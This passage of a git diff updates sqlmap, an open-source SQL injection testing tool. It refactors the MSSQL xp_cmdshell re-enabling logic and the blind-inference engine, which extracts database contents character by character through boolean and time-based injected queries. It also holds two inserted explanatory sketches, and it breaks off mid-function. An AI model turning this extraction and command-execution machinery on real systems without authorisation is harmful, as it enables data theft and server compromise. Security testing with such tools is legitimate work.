= inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if isNumPosStrValue(count): for index in getLimitRange(count): @@ -222,12 +232,16 @@ def xpCmdshellEvalCmd(self, cmd, first=None, last=None): inject.goStacked("DELETE FROM %s" % self.cmdTblName) if output and isListLike(output) and len(output) > 1: - if not (output[0] or "").strip(): - output = output[1:] - elif not (output[-1] or "").strip(): - output = output[:-1] + _ = "" + lines = [line for line in flattenValue(output) if line is not None] + + for i in xrange(len(lines)): + line = lines[i] or "" + if line is None or i in (0, len(lines) - 1) and not line.strip(): + continue + _ += "%s\n" % line - output = "\n".join(line for line in filter(None, output)) + output = _.rstrip('\n') return output @@ -247,9 +261,8 @@ def xpCmdshellInit(self): message = "xp_cmdshell extended procedure does not seem to " message += "be available. Do you want sqlmap to try to " message += "re-enable it? [Y/n] " - choice = readInput(message, default="Y") - if not choice or choice in ("y", "Y"): + if readInput(message, default='Y', boolean=True): self._xpCmdshellConfigure(1) if self._xpCmdshellCheck(): @@ -257,7 +270,7 @@ def xpCmdshellInit(self): kb.xpCmdshellAvailable = True else: - logger.warn("xp_cmdshell re-enabling failed") + logger.warning("xp_cmdshell re-enabling failed") logger.info("creating xp_cmdshell with sp_OACreate") self._xpCmdshellConfigure(0) @@ -270,7 +283,7 @@ def xpCmdshellInit(self): else: warnMsg = "xp_cmdshell creation failed, probably " warnMsg += "because sp_OACreate is disabled" - logger.warn(warnMsg) + logger.warning(warnMsg) hashDBWrite(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE, kb.xpCmdshellAvailable) diff --git a/lib/techniques/__init__.py b/lib/techniques/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/techniques/__init__.py +++ b/lib/techniques/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/techniques/blind/__init__.py b/lib/techniques/blind/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/techniques/blind/__init__.py +++ b/lib/techniques/blind/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 0fd59266281..2c1d3f41634 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -1,28 +1,33 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import threading +from __future__ import division + +import re import time -from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout -from lib.core.common import decodeHexValue +from lib.core.common import 
decodeDbmsHexValue from lib.core.common import decodeIntToUnicode from lib.core.common import filterControlChars from lib.core.common import getCharset from lib.core.common import getCounter -from lib.core.common import goGoodSamaritan from lib.core.common import getPartRun +from lib.core.common import getTechnique +from lib.core.common import getTechniqueData +from lib.core.common import goGoodSamaritan from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import incrementCounter +from lib.core.common import isDigit +from lib.core.common import isListLike from lib.core.common import safeStringFormat from lib.core.common import singleTimeWarnMessage from lib.core.data import conf @@ -34,22 +39,30 @@ from lib.core.enums import DBMS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapThreadException -from lib.core.progress import ProgressBar +from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.settings import CHAR_INFERENCE_MARK from lib.core.settings import INFERENCE_BLANK_BREAK -from lib.core.settings import INFERENCE_UNKNOWN_CHAR -from lib.core.settings import INFERENCE_GREATER_CHAR from lib.core.settings import INFERENCE_EQUALS_CHAR +from lib.core.settings import INFERENCE_GREATER_CHAR +from lib.core.settings import INFERENCE_MARKER from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR -from lib.core.settings import MAX_TIME_REVALIDATION_STEPS +from lib.core.settings import INFERENCE_UNKNOWN_CHAR +from lib.core.settings import MAX_BISECTION_LENGTH +from lib.core.settings import MAX_REVALIDATION_STEPS +from lib.core.settings import NULL from lib.core.settings import PARTIAL_HEX_VALUE_MARKER from lib.core.settings import PARTIAL_VALUE_MARKER +from lib.core.settings import PAYLOAD_DELIMITER +from lib.core.settings import RANDOM_INTEGER_MARKER from lib.core.settings import VALID_TIME_CHARS_RUN_THRESHOLD from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request +from lib.utils.progress import ProgressBar +from lib.utils.safe2bin import safecharencode from lib.utils.xrange import xrange +from thirdparty import six def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False): """ @@ -58,15 +71,27 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None """ abortedFlag = False + showEta = False partialValue = u"" finalValue = None retrievedLength = 0 - asciiTbl = getCharset(charsetType) - timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) + + if payload is None: + return 0, None + + if charsetType is None and conf.charset: + asciiTbl = sorted(set(ord(_) for _ in conf.charset)) + else: + asciiTbl = getCharset(charsetType) + + threadData = getCurrentThreadData() + timeBasedCompare = (getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) retVal = hashDBRetrieve(expression, checkConf=True) if retVal: - if PARTIAL_HEX_VALUE_MARKER in retVal: + if conf.repair and INFERENCE_UNKNOWN_CHAR in retVal: + pass + elif PARTIAL_HEX_VALUE_MARKER in retVal: retVal = retVal.replace(PARTIAL_HEX_VALUE_MARKER, "") if retVal and conf.hexConvert: @@ -86,30 +111,51 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None return 0, retVal + if Backend.isDbms(DBMS.MCKOI): + match = re.search(r"\ASELECT\b(.+)\bFROM\b(.+)\Z", expression, re.I) + if 
match: + original = queries[Backend.getIdentifiedDbms()].inference.query + right = original.split('<')[1] + payload = payload.replace(right, "(SELECT %s FROM %s)" % (right, match.group(2).strip())) + expression = match.group(1).strip() + + elif Backend.isDbms(DBMS.FRONTBASE): + match = re.search(r"\ASELECT\b(\s+TOP\s*\([^)]+\)\s+)?(.+)\bFROM\b(.+)\Z", expression, re.I) + if match: + payload = payload.replace(INFERENCE_GREATER_CHAR, " FROM %s)%s" % (match.group(3).strip(), INFERENCE_GREATER_CHAR)) + payload = payload.replace("SUBSTRING", "(SELECT%sSUBSTRING" % (match.group(1) if match.group(1) else " "), 1) + expression = match.group(2).strip() + try: - # Set kb.partRun in case "common prediction" feature (a.k.a. "good - # samaritan") is used - kb.partRun = getPartRun() if conf.predictOutput else None + # Set kb.partRun in case "common prediction" feature (a.k.a. "good samaritan") is used or the engine is called from the API + if conf.predictOutput: + kb.partRun = getPartRun() + elif conf.api: + kb.partRun = getPartRun(alias=False) + else: + kb.partRun = None if partialValue: firstChar = len(partialValue) - elif "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): + elif re.search(r"(?i)(\b|CHAR_)(LENGTH|LEN|COUNT)\(", expression): firstChar = 0 - elif dump and conf.firstChar is not None and (isinstance(conf.firstChar, int) or (isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit())): + elif conf.firstChar is not None and (isinstance(conf.firstChar, int) or (hasattr(conf.firstChar, "isdigit") and conf.firstChar.isdigit())): firstChar = int(conf.firstChar) - 1 - elif firstChar is None: - firstChar = 0 - elif (isinstance(firstChar, basestring) and firstChar.isdigit()) or isinstance(firstChar, int): + if kb.fileReadMode: + firstChar <<= 1 + elif hasattr(firstChar, "isdigit") and firstChar.isdigit() or isinstance(firstChar, int): firstChar = int(firstChar) - 1 + else: + firstChar = 0 - if "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): + if re.search(r"(?i)(\b|CHAR_)(LENGTH|LEN|COUNT)\(", expression): lastChar = 0 - elif dump and conf.lastChar is not None and (isinstance(conf.lastChar, int) or (isinstance(conf.lastChar, basestring) and conf.lastChar.isdigit())): + elif conf.lastChar is not None and (isinstance(conf.lastChar, int) or (hasattr(conf.lastChar, "isdigit") and conf.lastChar.isdigit())): lastChar = int(conf.lastChar) - elif lastChar in (None, "0"): - lastChar = 0 - elif (isinstance(lastChar, basestring) and lastChar.isdigit()) or isinstance(lastChar, int): + elif hasattr(lastChar, "isdigit") and lastChar.isdigit() or isinstance(lastChar, int): lastChar = int(lastChar) + else: + lastChar = 0 if Backend.getDbms(): _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) @@ -119,8 +165,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None else: expressionUnescaped = unescaper.escape(expression) - if length and isinstance(length, basestring) and length.isdigit(): + if isinstance(length, six.string_types) and isDigit(length) or isinstance(length, int): length = int(length) + else: + length = None if length == 0: return 0, "" @@ -128,85 +176,102 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if length and (lastChar > 0 or firstChar > 0): length = min(length, lastChar or length) - firstChar + if length and length > MAX_BISECTION_LENGTH: + length = None + showEta = conf.eta and isinstance(length, int) - numThreads = min(conf.threads, length) + + if kb.bruteMode: + 
numThreads = 1 + else: + numThreads = min(conf.threads or 0, length or 0) or 1 if showEta: progress = ProgressBar(maxValue=length) - progressTime = [] - - if timeBasedCompare and conf.threads > 1: - warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically" - singleTimeWarnMessage(warnMsg) if numThreads > 1: - if not timeBasedCompare: + if not timeBasedCompare or kb.forceThreads: debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) logger.debug(debugMsg) else: numThreads = 1 - if conf.threads == 1 and not timeBasedCompare and not conf.predictOutput: + if conf.threads == 1 and not any((timeBasedCompare, conf.predictOutput)): warnMsg = "running in a single-thread mode. Please consider " warnMsg += "usage of option '--threads' for faster data retrieval" singleTimeWarnMessage(warnMsg) - if conf.verbose in (1, 2) and not showEta: - if isinstance(length, int) and conf.threads > 1: + if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)): + if isinstance(length, int) and numThreads > 1: dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth))) dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) else: dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) - hintlock = threading.Lock() - def tryHint(idx): - with hintlock: + with kb.locks.hint: hintValue = kb.hintValue - if hintValue is not None and len(hintValue) >= idx: - if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB, DBMS.DB2): + if payload is not None and len(hintValue or "") > 0 and len(hintValue) >= idx: + if "'%s'" % CHAR_INFERENCE_MARK in payload: posValue = hintValue[idx - 1] else: posValue = ord(hintValue[idx - 1]) - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + markingValue = "'%s'" % CHAR_INFERENCE_MARK + unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) + forgedPayload = agent.extractPayload(payload) or "" + forgedPayload = forgedPayload.replace(markingValue, unescapedCharValue) + forgedPayload = safeStringFormat(forgedPayload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)) + result = Request.queryPage(agent.replacePayload(payload, forgedPayload), timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) if result: return hintValue[idx - 1] - with hintlock: - kb.hintValue = None + with kb.locks.hint: + kb.hintValue = "" return None def validateChar(idx, value): """ - Used in time-based inference (in case that original and retrieved - value are not equal there will be a deliberate delay). 
+ Used in inference - in time-based SQLi if original and retrieved value are not equal there will be a deliberate delay """ - if CHAR_INFERENCE_MARK not in payload: - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value)) + threadData = getCurrentThreadData() + + validationPayload = re.sub(r"(%s.*?)%s(.*?%s)" % (PAYLOAD_DELIMITER, INFERENCE_GREATER_CHAR, PAYLOAD_DELIMITER), r"\g<1>%s\g<2>" % INFERENCE_NOT_EQUALS_CHAR, payload) + + if "'%s'" % CHAR_INFERENCE_MARK not in payload: + forgedPayload = safeStringFormat(validationPayload, (expressionUnescaped, idx, value)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value)) - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) + forgedPayload = validationPayload.replace(markingValue, unescapedCharValue) + forgedPayload = safeStringFormat(forgedPayload, (expressionUnescaped, idx)) + + result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + + if result and timeBasedCompare and getTechniqueData().trueCode: + result = threadData.lastCode == getTechniqueData().trueCode + if not result: + warnMsg = "detected HTTP code '%s' in validation phase is differing from expected '%s'" % (threadData.lastCode, getTechniqueData().trueCode) + singleTimeWarnMessage(warnMsg) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + incrementCounter(getTechnique()) - return not result + return result - def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None): + def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): """ continuousOrder means that distance between each two neighbour's numerical values is exactly 1 """ + threadData = getCurrentThreadData() + result = tryHint(idx) if result: @@ -215,14 +280,20 @@ def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, if charTbl is None: charTbl = type(asciiTbl)(asciiTbl) - originalTbl = type(asciiTbl)(charTbl) + originalTbl = type(charTbl)(charTbl) - if continuousOrder and shiftTable is None: + if kb.disableShiftTable: + shiftTable = None + elif continuousOrder and shiftTable is None: # Used for gradual expanding into unicode charspace - shiftTable = [2, 2, 3, 3, 5, 4] + shiftTable = [2, 2, 3, 3, 3] - if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl: - charTbl.remove(ord('\n')) + if "'%s'" % CHAR_INFERENCE_MARK in payload: + for char in ('\n', '\r'): + if ord(char) in charTbl: + if not isinstance(charTbl, list): + charTbl = list(charTbl) + charTbl.remove(ord(char)) if not charTbl: return None @@ -230,7 +301,7 @@ def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, elif len(charTbl) == 1: forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0])) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + incrementCounter(getTechnique()) if result: return decodeIntToUnicode(charTbl[0]) @@ -238,41 +309,100 @@ def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, return None maxChar 
= maxValue = charTbl[-1] - minChar = minValue = charTbl[0] + minValue = charTbl[0] + firstCheck = False + lastCheck = False + unexpectedCode = False + + if continuousOrder: + while len(charTbl) > 1: + position = None + + if charsetType is None: + if not firstCheck: + try: + try: + lastChar = [_ for _ in threadData.shared.value if _ is not None][-1] + except IndexError: + lastChar = None + else: + if 'a' <= lastChar <= 'z': + position = charTbl.index(ord('a') - 1) # 96 + elif 'A' <= lastChar <= 'Z': + position = charTbl.index(ord('A') - 1) # 64 + elif '0' <= lastChar <= '9': + position = charTbl.index(ord('0') - 1) # 47 + except ValueError: + pass + finally: + firstCheck = True + + elif not lastCheck and numThreads == 1: # not usable in multi-threading environment + if charTbl[(len(charTbl) >> 1)] < ord(' '): + try: + # favorize last char check if current value inclines toward 0 + position = charTbl.index(1) + except ValueError: + pass + finally: + lastCheck = True + + if position is None: + position = (len(charTbl) >> 1) + + posValue = charTbl[position] + falsePayload = None + + if "'%s'" % CHAR_INFERENCE_MARK not in payload: + forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) + falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER)) + else: + # e.g.: ... > '%c' -> ... > ORD(..) + markingValue = "'%s'" % CHAR_INFERENCE_MARK + unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) + forgedPayload = payload.replace(markingValue, unescapedCharValue) + forgedPayload = safeStringFormat(forgedPayload, (expressionUnescaped, idx)) + falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL) + + if timeBasedCompare: + if kb.responseTimeMode: + kb.responseTimePayload = falsePayload + else: + kb.responseTimePayload = None - while len(charTbl) != 1: - position = (len(charTbl) >> 1) - posValue = charTbl[position] + result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - if CHAR_INFERENCE_MARK not in payload: - forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) - else: - # e.g.: ... > '%c' -> ... > ORD(..) - markingValue = "'%s'" % CHAR_INFERENCE_MARK - unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) - forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) + incrementCounter(getTechnique()) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + if not timeBasedCompare and getTechniqueData() is not None: + unexpectedCode |= threadData.lastCode not in (getTechniqueData().falseCode, getTechniqueData().trueCode) + if unexpectedCode: + if threadData.lastCode is not None: + warnMsg = "unexpected HTTP code '%s' detected." % threadData.lastCode + else: + warnMsg = "unexpected response detected." 
- if result: - minValue = posValue + warnMsg += " Will use (extra) validation step in similar cases" - if type(charTbl) != xrange: - charTbl = charTbl[position:] - else: - # xrange() - extended virtual charset used for memory/space optimization - charTbl = xrange(charTbl[position], charTbl[-1] + 1) - else: - maxValue = posValue + singleTimeWarnMessage(warnMsg) - if type(charTbl) != xrange: - charTbl = charTbl[:position] + if result: + minValue = posValue + + if not isinstance(charTbl, xrange): + charTbl = charTbl[position:] + else: + # xrange() - extended virtual charset used for memory/space optimization + charTbl = xrange(charTbl[position], charTbl[-1] + 1) else: - charTbl = xrange(charTbl[0], charTbl[position]) + maxValue = posValue - if len(charTbl) == 1: - if continuousOrder: + if not isinstance(charTbl, xrange): + charTbl = charTbl[:position] + else: + charTbl = xrange(charTbl[0], charTbl[position]) + + if len(charTbl) == 1: if maxValue == 1: return None @@ -285,35 +415,37 @@ def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, # list if expand and shiftTable: charTbl = xrange(maxChar + 1, (maxChar + 1) << shiftTable.pop()) - originalTbl = xrange(charTbl) + originalTbl = xrange(charTbl[0], charTbl[-1] + 1) maxChar = maxValue = charTbl[-1] - minChar = minValue = charTbl[0] + minValue = charTbl[0] else: + kb.disableShiftTable = True return None else: retVal = minValue + 1 if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): - if timeBasedCompare and not validateChar(idx, retVal): + if (timeBasedCompare or unexpectedCode) and not validateChar(idx, retVal): if not kb.originalTimeDelay: kb.originalTimeDelay = conf.timeSec - kb.timeValidCharsRun = 0 - if (conf.timeSec - kb.originalTimeDelay) < MAX_TIME_REVALIDATION_STEPS: + threadData.validationRun = 0 + if (retried or 0) < MAX_REVALIDATION_STEPS: errMsg = "invalid character detected. retrying.." logger.error(errMsg) - conf.timeSec += 1 + if timeBasedCompare: + if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: + conf.timeSec += 1 + warnMsg = "increasing time delay to %d second%s" % (conf.timeSec, 's' if conf.timeSec > 1 else '') + logger.warning(warnMsg) - warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') - logger.warn(warnMsg) + if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: + dbgMsg = "turning off time auto-adjustment mechanism" + logger.debug(dbgMsg) + kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: - dbgMsg = "turning off time auto-adjustment mechanism" - logger.debug(dbgMsg) - kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO - - return getChar(idx, originalTbl, continuousOrder, expand, shiftTable) + return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1) else: errMsg = "unable to properly validate last character value ('%s').." 
% decodeIntToUnicode(retVal) logger.error(errMsg) @@ -321,8 +453,8 @@ def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, return decodeIntToUnicode(retVal) else: if timeBasedCompare: - kb.timeValidCharsRun += 1 - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD: + threadData.validationRun += 1 + if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun > VALID_TIME_CHARS_RUN_THRESHOLD: dbgMsg = "turning back on time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES @@ -330,39 +462,53 @@ def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, return decodeIntToUnicode(retVal) else: return None - else: - if minValue == maxChar or maxValue == minChar: - return None + else: + if "'%s'" % CHAR_INFERENCE_MARK in payload and conf.charset: + errMsg = "option '--charset' is not supported on '%s'" % Backend.getIdentifiedDbms() + raise SqlmapUnsupportedFeatureException(errMsg) + + candidates = list(originalTbl) + bit = 0 + while len(candidates) > 1: + bits = {} + maxCandidate = max(candidates) + maxBits = maxCandidate.bit_length() if maxCandidate > 0 else 1 + + for candidate in candidates: + for bit in xrange(maxBits): + bits.setdefault(bit, 0) + if candidate & (1 << bit): + bits[bit] += 1 + else: + bits[bit] -= 1 - # If we are working with non-continuous elements, set - # both minValue and character afterwards are possible - # candidates - for retVal in (originalTbl[originalTbl.index(minValue)], originalTbl[originalTbl.index(minValue) + 1]): - forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal)) - result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + choice = sorted(bits.items(), key=lambda _: abs(_[1]))[0][0] + mask = 1 << choice - if result: - return decodeIntToUnicode(retVal) + forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, "&%d%s" % (mask, INFERENCE_GREATER_CHAR)), (expressionUnescaped, idx, 0)) + result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) - return None + if result: + candidates = [_ for _ in candidates if _ & mask > 0] + else: + candidates = [_ for _ in candidates if _ & mask == 0] - def etaProgressUpdate(charTime, index): - if len(progressTime) <= ((length * 3) / 100): - eta = 0 - else: - midTime = sum(progressTime) / len(progressTime) - midTimeWithLatest = (midTime + charTime) / 2 - eta = midTimeWithLatest * (length - index) / conf.threads + bit += 1 - progressTime.append(charTime) - progress.update(index) - progress.draw(eta) + if candidates: + forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, candidates[0])) + result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) - # Go multi-threading (--threads > 1) - if conf.threads > 1 and isinstance(length, int) and length > 1: - threadData = getCurrentThreadData() + if result: + if candidates[0] == 0: # Trailing zeros + return None + else: + return decodeIntToUnicode(candidates[0]) + # Go multi-threading (--threads > 1) + if numThreads > 1 and isinstance(length, int) and length > 1: threadData.shared.value = [None] * length threadData.shared.index = [firstChar] # As list for python 
nested function scoping threadData.shared.start = firstChar @@ -372,32 +518,31 @@ def blindThread(): threadData = getCurrentThreadData() while kb.threadContinue: - kb.locks.index.acquire() - - if threadData.shared.index[0] - firstChar >= length: - kb.locks.index.release() - - return + with kb.locks.index: + if threadData.shared.index[0] - firstChar >= length: + return - threadData.shared.index[0] += 1 - curidx = threadData.shared.index[0] - kb.locks.index.release() + threadData.shared.index[0] += 1 + currentCharIndex = threadData.shared.index[0] if kb.threadContinue: - charStart = time.time() - val = getChar(curidx) + val = getChar(currentCharIndex, asciiTbl, not (charsetType is None and conf.charset)) if val is None: val = INFERENCE_UNKNOWN_CHAR else: break + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4629 + if not isListLike(threadData.shared.value): + break + with kb.locks.value: - threadData.shared.value[curidx - 1 - firstChar] = val + threadData.shared.value[currentCharIndex - 1 - firstChar] = val currentValue = list(threadData.shared.value) if kb.threadContinue: if showEta: - etaProgressUpdate(time.time() - charStart, threadData.shared.index[0]) + progress.progress(threadData.shared.index[0]) elif conf.verbose >= 1: startCharIndex = 0 endCharIndex = 0 @@ -414,24 +559,24 @@ def blindThread(): count = threadData.shared.start for i in xrange(startCharIndex, endCharIndex + 1): - output += '_' if currentValue[i] is None else currentValue[i] + output += '_' if currentValue[i] is None else filterControlChars(currentValue[i] if len(currentValue[i]) == 1 else ' ', replacement=' ') for i in xrange(length): count += 1 if currentValue[i] is not None else 0 if startCharIndex > 0: - output = '..' + output[2:] + output = ".." + output[2:] if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1): - output = output[:-2] + '..' + output = output[:-2] + ".." 
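# Illustrative sketch (not part of this patch; all names below are hypothetical):
# the candidate-narrowing loop added to getChar() above, used for non-continuous
# charsets, repeatedly picks the bit that splits the remaining candidates most
# evenly and spends one request per chosen bit mask. The oracle argument stands
# in for Request.queryPage() answering "does the hidden ordinal have this bit set?".

def narrow_candidates(candidates, oracle):
    candidates = list(candidates)

    while len(candidates) > 1:
        counts = {}
        max_bits = max(candidates).bit_length() or 1

        # Score each bit by how evenly it splits the remaining candidates
        for value in candidates:
            for bit in range(max_bits):
                counts[bit] = counts.get(bit, 0) + (1 if value & (1 << bit) else -1)

        best_bit = min(counts.items(), key=lambda item: abs(item[1]))[0]
        mask = 1 << best_bit

        if oracle(mask):                                  # one request per chosen mask
            candidates = [_ for _ in candidates if _ & mask]
        else:
            candidates = [_ for _ in candidates if not _ & mask]

    return candidates[0] if candidates else None

# Example: hidden character 'm' (ordinal 109) inside a sparse charset
secret = ord('m')
charset = [ord(_) for _ in "aeimqux"]
assert narrow_candidates(charset, lambda mask: secret & mask != 0) == secret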
- if conf.verbose in (1, 2) and not showEta: + if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)): _ = count - firstChar output += '_' * (min(length, conf.progressWidth) - len(output)) - status = ' %d/%d (%d%%)' % (_, length, round(100.0 * _ / length)) + status = ' %d/%d (%d%%)' % (_, length, int(100.0 * _ / length)) output += status if _ != length else " " * len(status) - dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output))) + dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), output)) runThreads(numThreads, blindThread, startThreadMsg=False) @@ -439,12 +584,13 @@ def blindThread(): abortedFlag = True finally: - value = [partialValue[_] if _ < len(partialValue) else threadData.shared.value[_] for _ in xrange(length)] + value = [_ for _ in partialValue] + value.extend(_ for _ in threadData.shared.value) infoMsg = None # If we have got one single character not correctly fetched it - # can mean that the connection to the target url was lost + # can mean that the connection to the target URL was lost if None in value: partialValue = "".join(value[:value.index(None)]) @@ -454,16 +600,16 @@ def blindThread(): finalValue = "".join(value) infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue)) - if conf.verbose in (1, 2) and not showEta and infoMsg: + if conf.verbose in (1, 2) and infoMsg and not any((showEta, conf.api, kb.bruteMode)): dataToStdout(infoMsg) # No multi-threading (--threads = 1) else: index = firstChar + threadData.shared.value = "" while True: index += 1 - charStart = time.time() # Common prediction feature (a.k.a. "good samaritan") # NOTE: to be used only when multi-threading is not set for @@ -477,20 +623,22 @@ def blindThread(): if commonValue is not None: # One-shot query containing equals commonValue testValue = unescaper.escape("'%s'" % commonValue) if "'" not in commonValue else unescaper.escape("%s" % commonValue, quote=False) - query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue))) + + query = getTechniqueData().vector + query = agent.prefixQuery(query.replace(INFERENCE_MARKER, "(%s)%s%s" % (expressionUnescaped, INFERENCE_EQUALS_CHAR, testValue))) query = agent.suffixQuery(query) + result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + incrementCounter(getTechnique()) # Did we have luck? 
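# Illustrative sketch (not part of this patch; names are hypothetical): the worker
# pattern used by blindThread() above - each thread claims the next character index
# under a lock and writes its result into a pre-sized shared slot list, so the
# retrieved value stays ordered no matter which thread finishes first.

import threading

def retrieve_in_parallel(length, fetch_char, num_threads=4):
    value = [None] * length                  # one slot per character position
    state = {"index": 0}
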